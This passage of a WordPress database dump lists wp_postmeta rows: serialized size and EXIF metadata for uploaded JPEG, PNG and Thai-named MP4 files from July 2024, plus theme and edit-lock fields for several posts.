(190,70,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:59:\"2024/07/449338885_977488297502175_3280432045101593419_n.jpg\";s:8:\"filesize\";i:477184;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"449338885_977488297502175_3280432045101593419_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22758;}s:5:\"large\";a:5:{s:4:\"file\";s:60:\"449338885_977488297502175_3280432045101593419_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:187468;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"449338885_977488297502175_3280432045101593419_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9101;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"449338885_977488297502175_3280432045101593419_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:206919;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:61:\"449338885_977488297502175_3280432045101593419_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:363091;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"449338885_977488297502175_3280432045101593419_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20291;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(191,69,'_generateblocks_dynamic_css_version','1.9.1'),
(192,71,'_wp_attached_file','2024/07/449394860_977488040835534_2883094426265367481_n.jpg'),
(193,71,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:59:\"2024/07/449394860_977488040835534_2883094426265367481_n.jpg\";s:8:\"filesize\";i:650716;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"449394860_977488040835534_2883094426265367481_n-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20170;}s:5:\"large\";a:5:{s:4:\"file\";s:60:\"449394860_977488040835534_2883094426265367481_n-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:182759;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"449394860_977488040835534_2883094426265367481_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10240;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"449394860_977488040835534_2883094426265367481_n-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109674;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:60:\"449394860_977488040835534_2883094426265367481_n-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:357122;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"449394860_977488040835534_2883094426265367481_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26592;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(195,69,'_thumbnail_id','71'),
(196,69,'_edit_last','1'),
(197,69,'title_style','default'),
(198,69,'_title_style','field_5d1a0217cf408'),
(199,69,'related',''),
(200,69,'_related','field_603b51c3e183e'),
(201,72,'title_style','default'),
(202,72,'_title_style','field_5d1a0217cf408'),
(203,72,'related',''),
(204,72,'_related','field_603b51c3e183e'),
(205,73,'title_style','default'),
(206,73,'_title_style','field_5d1a0217cf408'),
(207,74,'title_style','default'),
(208,74,'_title_style','field_5d1a0217cf408'),
(210,76,'title_style','default'),
(211,76,'_title_style','field_5d1a0217cf408'),
(213,78,'title_style','default'),
(214,78,'_title_style','field_5d1a0217cf408'),
(216,80,'title_style','default'),
(217,80,'_title_style','field_5d1a0217cf408'),
(218,81,'title_style','default'),
(219,81,'_title_style','field_5d1a0217cf408'),
(220,82,'title_style','default'),
(221,82,'_title_style','field_5d1a0217cf408'),
(223,84,'title_style','default'),
(224,84,'_title_style','field_5d1a0217cf408'),
(225,85,'title_style','default'),
(226,85,'_title_style','field_5d1a0217cf408'),
(228,87,'title_style','default'),
(229,87,'_title_style','field_5d1a0217cf408'),
(231,89,'title_style','default'),
(232,89,'_title_style','field_5d1a0217cf408'),
(233,90,'title_style','default'),
(234,90,'_title_style','field_5d1a0217cf408'),
(236,92,'_edit_lock','1722054020:1'),
(237,93,'_wp_attached_file','2024/07/449454973_976271077623897_4313101419573319686_n.jpg'),
(238,93,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:4:\"file\";s:59:\"2024/07/449454973_976271077623897_4313101419573319686_n.jpg\";s:8:\"filesize\";i:636890;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"449454973_976271077623897_4313101419573319686_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22317;}s:5:\"large\";a:5:{s:4:\"file\";s:60:\"449454973_976271077623897_4313101419573319686_n-1024x769.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:769;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:218041;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"449454973_976271077623897_4313101419573319686_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8194;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"449454973_976271077623897_4313101419573319686_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:124668;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:61:\"449454973_976271077623897_4313101419573319686_n-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:431323;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"449454973_976271077623897_4313101419573319686_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23618;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(240,92,'_thumbnail_id','93'),
(241,92,'_edit_last','1'),
(242,92,'title_style','default'),
(243,92,'_title_style','field_5d1a0217cf408'),
(244,92,'related',''),
(245,92,'_related','field_603b51c3e183e'),
(246,94,'title_style','default'),
(247,94,'_title_style','field_5d1a0217cf408'),
(248,94,'related',''),
(249,94,'_related','field_603b51c3e183e'),
(250,95,'_edit_lock','1722054383:1'),
(251,96,'_wp_attached_file','2024/07/449089082_974870507763954_1552515886644416971_n.jpg'),
(252,96,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:59:\"2024/07/449089082_974870507763954_1552515886644416971_n.jpg\";s:8:\"filesize\";i:633465;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"449089082_974870507763954_1552515886644416971_n-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19971;}s:5:\"large\";a:5:{s:4:\"file\";s:60:\"449089082_974870507763954_1552515886644416971_n-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:182376;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"449089082_974870507763954_1552515886644416971_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10198;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"449089082_974870507763954_1552515886644416971_n-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:109341;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:60:\"449089082_974870507763954_1552515886644416971_n-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:353658;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"449089082_974870507763954_1552515886644416971_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26198;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(254,95,'_thumbnail_id','96'),
(255,95,'_edit_last','1'),
(256,95,'title_style','default'),
(257,95,'_title_style','field_5d1a0217cf408'),
(258,97,'title_style','default'),
(259,97,'_title_style','field_5d1a0217cf408'),
(260,98,'title_style','default'),
(261,98,'_title_style','field_5d1a0217cf408'),
(263,100,'title_style','default'),
(264,100,'_title_style','field_5d1a0217cf408'),
(265,101,'title_style','default'),
(266,101,'_title_style','field_5d1a0217cf408'),
(267,102,'title_style','default'),
(268,102,'_title_style','field_5d1a0217cf408'),
(269,103,'title_style','default'),
(270,103,'_title_style','field_5d1a0217cf408'),
(272,104,'title_style','default'),
(273,104,'_title_style','field_5d1a0217cf408'),
(275,106,'title_style','default'),
(276,106,'_title_style','field_5d1a0217cf408'),
(278,108,'title_style','default'),
(279,108,'_title_style','field_5d1a0217cf408'),
(280,109,'title_style','default'),
(281,109,'_title_style','field_5d1a0217cf408'),
(282,110,'title_style','default'),
(283,110,'_title_style','field_5d1a0217cf408'),
(285,112,'title_style','default'),
(286,112,'_title_style','field_5d1a0217cf408'),
(288,114,'_wp_attached_file','2024/07/448139628_966407788610226_7865904298730785944_n.jpg'),
(289,114,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:417;s:6:\"height\";i:590;s:4:\"file\";s:59:\"2024/07/448139628_966407788610226_7865904298730785944_n.jpg\";s:8:\"filesize\";i:77809;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"448139628_966407788610226_7865904298730785944_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26456;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"448139628_966407788610226_7865904298730785944_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10541;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"448139628_966407788610226_7865904298730785944_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24352;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(304,117,'_wp_attached_file','2024/07/448248415_967051708545834_5547887755426689730_n.jpg'),
(305,117,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:59:\"2024/07/448248415_967051708545834_5547887755426689730_n.jpg\";s:8:\"filesize\";i:359593;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"448248415_967051708545834_5547887755426689730_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25075;}s:5:\"large\";a:5:{s:4:\"file\";s:60:\"448248415_967051708545834_5547887755426689730_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:177438;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"448248415_967051708545834_5547887755426689730_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10435;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"448248415_967051708545834_5547887755426689730_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:198053;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:61:\"448248415_967051708545834_5547887755426689730_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:324699;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"448248415_967051708545834_5547887755426689730_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26645;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:7:\"nut nut\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(316,120,'_wp_attached_file','2024/07/448576570_969225221661816_9011581166762903674_n.jpg'),
(317,120,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:59:\"2024/07/448576570_969225221661816_9011581166762903674_n.jpg\";s:8:\"filesize\";i:328258;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"448576570_969225221661816_9011581166762903674_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21330;}s:5:\"large\";a:5:{s:4:\"file\";s:60:\"448576570_969225221661816_9011581166762903674_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:135467;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"448576570_969225221661816_9011581166762903674_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8558;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:60:\"448576570_969225221661816_9011581166762903674_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:148221;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:61:\"448576570_969225221661816_9011581166762903674_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:241109;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"448576570_969225221661816_9011581166762903674_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20283;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(318,121,'_wp_attached_file','2024/07/449112359_974870577763947_8285412201600408380_n.jpg'),
(319,121,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:417;s:6:\"height\";i:590;s:4:\"file\";s:59:\"2024/07/449112359_974870577763947_8285412201600408380_n.jpg\";s:8:\"filesize\";i:75538;s:5:\"sizes\";a:3:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"449112359_974870577763947_8285412201600408380_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25182;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"449112359_974870577763947_8285412201600408380_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10645;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"449112359_974870577763947_8285412201600408380_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24052;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(334,124,'_wp_attached_file','2024/07/449601269_976771944240477_531928953334737882_n.jpg'),
(335,124,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:58:\"2024/07/449601269_976771944240477_531928953334737882_n.jpg\";s:8:\"filesize\";i:464835;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:58:\"449601269_976771944240477_531928953334737882_n-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:26403;}s:5:\"large\";a:5:{s:4:\"file\";s:59:\"449601269_976771944240477_531928953334737882_n-724x1024.jpg\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:197724;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:58:\"449601269_976771944240477_531928953334737882_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10723;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"449601269_976771944240477_531928953334737882_n-768x1086.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:216655;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:60:\"449601269_976771944240477_531928953334737882_n-1086x1536.jpg\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:368314;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:58:\"449601269_976771944240477_531928953334737882_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23339;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(351,127,'title_style','default'),
(352,127,'_title_style','field_5d1a0217cf408'),
(354,129,'title_style','default'),
(355,129,'_title_style','field_5d1a0217cf408'),
(356,130,'title_style','default'),
(357,130,'_title_style','field_5d1a0217cf408'),
(358,131,'title_style','default'),
(359,131,'_title_style','field_5d1a0217cf408'),
(360,132,'title_style','default'),
(361,132,'_title_style','field_5d1a0217cf408'),
(362,133,'title_style','default'),
(363,133,'_title_style','field_5d1a0217cf408'),
(364,134,'title_style','default'),
(365,134,'_title_style','field_5d1a0217cf408'),
(367,136,'title_style','default'),
(368,136,'_title_style','field_5d1a0217cf408'),
(370,138,'_wp_attached_file','2024/07/สุนทนภู่.mp4'),
(371,138,'_wp_attachment_metadata','a:11:{s:7:\"bitrate\";i:294405;s:8:\"filesize\";i:20517953;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:479;s:16:\"length_formatted\";s:4:\"7:59\";s:5:\"width\";i:480;s:6:\"height\";i:270;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:9:{s:10:\"dataformat\";s:3:\"mp4\";s:7:\"bitrate\";i:47998;s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:48000;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";s:17:\"compression_ratio\";d:0.031248697916666665;}s:17:\"created_timestamp\";i:-2082844800;}'),
(372,139,'title_style','default'),
(373,139,'_title_style','field_5d1a0217cf408'),
(374,140,'title_style','default'),
(375,140,'_title_style','field_5d1a0217cf408'),
(377,142,'_wp_attached_file','2024/07/สุขาดี.mp4'),
(378,142,'_wp_attachment_metadata','a:11:{s:7:\"bitrate\";i:171293;s:8:\"filesize\";i:5300766;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:189;s:16:\"length_formatted\";s:4:\"3:09\";s:5:\"width\";i:480;s:6:\"height\";i:270;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:9:{s:10:\"dataformat\";s:3:\"mp4\";s:7:\"bitrate\";i:48019;s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:44100;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";s:17:\"compression_ratio\";d:0.03402706916099773;}s:17:\"created_timestamp\";i:-2082844800;}'),
(379,143,'title_style','default'),
(380,143,'_title_style','field_5d1a0217cf408'),
(381,144,'_wp_attached_file','2024/07/448905004_973201524597519_7994539186753533290_n.jpg'),
(382,144,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2048;s:6:\"height\";i:1024;s:4:\"file\";s:59:\"2024/07/448905004_973201524597519_7994539186753533290_n.jpg\";s:8:\"filesize\";i:356785;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:59:\"448905004_973201524597519_7994539186753533290_n-300x150.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17130;}s:5:\"large\";a:5:{s:4:\"file\";s:60:\"448905004_973201524597519_7994539186753533290_n-1024x512.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110632;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:59:\"448905004_973201524597519_7994539186753533290_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9076;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:59:\"448905004_973201524597519_7994539186753533290_n-768x384.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:384;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:71183;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:60:\"448905004_973201524597519_7994539186753533290_n-1536x768.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:194610;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:59:\"448905004_973201524597519_7994539186753533290_n-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22659;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(383,145,'_wp_attached_file','2024/07/Untitled.png'),
(384,145,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1451;s:6:\"height\";i:857;s:4:\"file\";s:20:\"2024/07/Untitled.png\";s:8:\"filesize\";i:1756162;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:20:\"Untitled-300x177.png\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:84724;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"Untitled-1024x605.png\";s:5:\"width\";i:1024;s:6:\"height\";i:605;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:680781;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:20:\"Untitled-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:41305;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:20:\"Untitled-768x454.png\";s:5:\"width\";i:768;s:6:\"height\";i:454;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:423258;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:20:\"Untitled-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:113945;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s: